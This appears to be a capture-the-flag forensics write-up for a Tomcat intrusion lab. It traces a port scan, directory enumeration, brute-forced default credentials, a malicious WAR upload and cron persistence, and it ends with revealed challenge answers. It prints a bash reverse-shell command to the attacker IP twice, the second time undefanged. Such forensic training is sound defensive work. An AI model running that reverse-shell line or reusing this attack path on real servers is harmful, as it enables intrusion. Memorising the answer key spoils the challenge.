// CyberDefenders · Network Forensics

Tomcat Takeover

CyberDefenders Easy Wireshark

[Reconnaissance, Execution, Persistence, Privilege Escalation, Credential Access, Discovery, Command and Control]

proof of completion → challenge page → ← all labs

Scenario

Overview

A web server on the company intranet was flagged for suspicious activity. A PCAP was captured for analysis. The goal was to reconstruct the full attack chain — from initial reconnaissance through to persistence — against an Apache Tomcat web server.

Investigation

Identifying the Attacker

With only one external IP address present in the capture, the attacker was immediately identifiable. Geolocation placed the source IP in China.

Attacker IP: 14[.]0[.]0[.]120

Reconnaissance

Filtering by attacker IP and HTTP traffic revealed a port scan followed by directory enumeration activity consistent with Gobuster:

ip.addr == 14.0.0.120 && http

The scan uncovered several open ports. Port 8080 was identified as exposing the Tomcat admin panel.

Directory Enumeration

HTTP stream analysis confirmed Gobuster was used to enumerate directories. The attacker successfully discovered the /manager endpoint — Tomcat’s web application manager interface.

Credential Brute Force

With the admin panel located, the attacker brute-forced credentials. The successful login was:

Username: admin
Password: tomcat

WAR File Upload / Reverse Shell

Following authentication to /manager, the attacker uploaded a malicious WAR file to deploy a reverse shell:

Filename: JXQOZY.war

HTTP stream analysis of the POST request confirmed the upload. Following the resulting TCP stream revealed the attacker’s shell session.

Persistence

After establishing the reverse shell, the attacker scheduled a cron job to maintain persistent access:

Scheduled command:

/bin/bash -c 'bash -i >& /dev/tcp/14[.]0[.]0[.]120/443 0>&1'

MITRE ATT&CK

Technique	ID	Description
Network Service Scanning	T1046	Port scan to identify open services
Brute Force	T1110	Credential brute-force against Tomcat manager
Deploy Container / Server Software	T1505.003	WAR file upload for server-side execution
Command and Scripting Interpreter: Unix Shell	T1059.004	Bash reverse shell
Scheduled Task/Job: Cron	T1053.003	Cron-based persistence

IOCs

Type	Value
Attacker IP	`14[.]0[.]0[.]120`
Attacker Country	China
Admin Port	`8080`
Enumeration Tool	Gobuster
Admin Directory	`/manager`
Credentials	`admin:tomcat`
Malicious File	`JXQOZY.war`
C2 Callback	`14[.]0[.]0[.]120:443`

Lessons Learned

Default Tomcat credentials (admin:tomcat) should be rotated immediately on deployment — this is a trivially guessable pair that any basic wordlist will crack
The Tomcat manager interface (/manager) should never be exposed externally and should be restricted by IP allowlist
WAR file upload capability should be disabled or locked down in production environments
Cron persistence via reverse shell callback is a common post-exploitation step — scheduled task monitoring and outbound connection baselining would catch this

References

MITRE ATT&CK T1505.003 - Server Software Component: Web Shell

Given the suspicious activity detected on the web server, the PCAP file reveals a series of requests across various ports, indicating potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?

Click flag to reveal 14.0.0.120

Based on the identified IP address associated with the attacker, can you identify the country from which the attacker's activities originated?

Click to reveal answer china

From the PCAP file, multiple open ports were detected as a result of the attacker's active scan. Which of these ports provides access to the web server admin panel?

Click flag to reveal 8080

Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?

Click to reveal answer gobuster

After the effort to enumerate directories on our web server, the attacker made numerous requests to identify administrative interfaces. Which specific directory related to the admin panel did the attacker uncover?

Click flag to reveal /manager

After accessing the admin panel, the attacker tried to brute-force the login credentials. Can you determine the correct username and password that the attacker successfully used for login?

Click to reveal answer admin:tomcat

Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?

Click flag to reveal JXQOZY.war

After successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?

Click to reveal answer /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'